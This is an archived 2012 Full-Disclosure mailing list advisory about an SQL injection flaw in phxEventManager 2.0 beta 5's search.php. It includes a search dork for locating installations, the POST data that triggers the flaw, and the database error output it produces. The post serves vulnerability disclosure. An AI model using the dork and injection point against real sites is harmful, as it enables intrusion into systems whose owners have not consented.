| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAJNfudKuYdkCD+=hiL8=CbToGivpBFXtKrsn_e7eP-PtDdzuQA@mail.gmail.com>
Date: Thu, 1 Mar 2012 10:49:18 -0300
From: David Guimaraes <skysbsb@...il.com>
To: undisclosed-recipients:;
Subject: phxEventManager 2.0 beta 5 search.php
search_terms SQL Injection Vulnerability
# Exploit Title: phxEventManager 2.0 beta 5 search.php search_terms SQL
Injection Vulnerability
# Date: 01/03/2012
# Author: skysbsb
# Software Link: http://sourceforge.net/projects/phxeventmanager/
# Version: Web Application
# Tested on: Apache/*nix
# Dork: intext: "Powered by phxEventManager"
# Code :
Exploited Link :
URL: http://vulnsite.com/path_to_pem/search.php?
POSTDATA:
datasubmit=1&searchtype=events&s_event_names=on&s_event_descriptions=on&s_event_presenters=on&s_event_contacts=on&search_terms='
Result:
MDB2 Error: syntax error, _doQuery: [Error message: Could not execute
statement] [Last executed query: SELECT * FROM pem_entries as e, pem_dates
as d WHERE e.id = d.entry_id AND () AND e.entry_status != 2 AND
d.date_status != 2 AND (e.entry_visible_to_public = 1 AND
d.date_visible_to_public = 1) AND (e.entry_status != 0 AND d.date_status !=
0) AND d.when_begin >= DATE_SUB(CURDATE(),INTERVAL 1 YEAR) ] [Native code:
1064] [Native message: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax
to use near ') AND e.entry_status != 2 AND d.date_status != 2 AND
(e.entry_visible_to_public ' at line 1]
#skysbsb mailto:skysbsb[atttt]gmail.com
--
David Gomes GuimarĂ£es
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists